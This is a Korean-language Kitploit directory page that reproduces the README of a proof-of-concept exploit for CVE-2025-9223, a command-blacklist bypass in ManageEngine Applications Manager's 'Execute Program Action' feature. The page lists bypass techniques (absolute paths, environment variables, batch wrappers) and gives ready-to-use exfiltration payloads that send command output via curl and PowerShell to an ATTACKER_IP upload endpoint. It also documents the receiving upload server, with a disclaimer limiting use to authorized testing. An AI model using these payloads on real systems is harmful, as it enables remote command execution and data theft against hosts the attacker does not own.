Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-9223 — PoC CVE-2025-9223 | Kitploit
도구/GitHubGitHub/networkkiller/cve-2025-9223
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPenetration TestingCommand and ControlLearning & Education
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

PoC CVE-2025-9223

저장소 보기
29개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Applications Manager - Execute Program Action Bypass PoC

Security Research Python 3.x Proof of Concept

📖 설명

이 저장소에는 ManageEngine Applications Manager의 "Execute Program Action" 기능에서 명령 실행 취약점을 입증하는 개념 증명(PoC)이 포함되어 있습니다.

🔍 취약점 세부 정보

Applications Manager는 위험한 명령을 차단하기 위해 블랙리스트(BlackListCommands)를 사용하지만, 검증에는 치명적인 결함이 있습니다:

  • 문자열 기반 검증은 첫 번째 토큰에만 적용됨
  • 경로 정규화 또는 환경 변수 확장 없음
  • 스크립트를 통한 간접 실행에 대한 보호 없음

🚨 우회 방법

방법예시
절대 경로C:\Windows\System32\netstat.exe
환경 변수%SystemRoot%\System32\netstat.exe
스크립트 래퍼echo netstat > a.bat && a.bat

💥 영향

  • ✅ Applications Manager 호스트에서 인증된 원격 코드 실행(RCE)
  • ✅ 보안 제한을 우회한 전체 시스템 명령 실행
  • ✅ 시스템 유틸리티(curl, powershell, certutil)를 사용한 데이터 유출

📤 데이터 유출 Payload 예시

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ 구성 및 사용

사전 요구 사항

  • Python 3.x
  • 대상 Applications Manager 인스턴스에 대한 네트워크 접근
  • "Execute Program Action" 권한이 있는 인증된 접근

파일 업로드 서버

upload_server.py 스크립트는 유출된 파일을 수신하기 위한 간단한 HTTP 서버를 제공합니다.

기본 사용법

root@kitploit:~
python3 upload_server.py

고급 옵션

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

매개변수

  • --host: 바인딩 주소(기본값: 0.0.0.0)
  • --port: HTTP 포트(기본값: 8000)
  • --dir: 출력 디렉터리(기본값: 현재 디렉터리)

API 엔드포인트

메서드엔드포인트

보안 기능

✅ 경로 탐색(path traversal) 방지
✅ 타임스탬프가 포함된 고유 파일 이름
✅ IP 및 User-Agent 요청 기록
✅ 콘텐츠 유형 검증

🎯 테스트 명령

우회 예시가 포함된 test_commands.txt 파일을 생성하세요:

root@kitploit:~
# 절대 경로를 사용한 우회
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# 환경 변수를 사용한 우회
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# 스크립트 래퍼를 사용한 우회
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# 데이터 유출 예시
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ 법적 고지

중요: 이 도구는 교육 목적과 승인된 테스트 목적으로만 제공됩니다.

❌ 금지: 소유하지 않거나 테스트할 명시적 권한이 없는 시스템에서 사용
❌ 금지: 불법 활동에 사용
✅ 허용: 보안 연구를 위해 통제된 환경에서만 사용
✅ 허용: 테스트 전에 적절한 승인을 받기

저자는 이 도구의 어떠한 오용에도 책임을 지지 않습니다. 사용자는 모든 책임과 위험을 감수합니다.

📄 라이선스

이 프로젝트는 연구 및 교육 목적으로만 제공됩니다. 모든 권리는 저작권자에게 있습니다.

👨‍💻 저자

Johan Aybar - 교육 목적


⚠️ 알림: 이 PoC는 승인된 테스트 환경에서만 사용해야 합니다. 승인되지 않은 사용은 불법일 수 있으며 엄격히 금지됩니다.

도구 다운로드
설명
GET/최근 업로드된 파일 목록 표시
POST/upload파일 업로드(multipart/form-data)
PUT/upload/[filename]파일 직접 업로드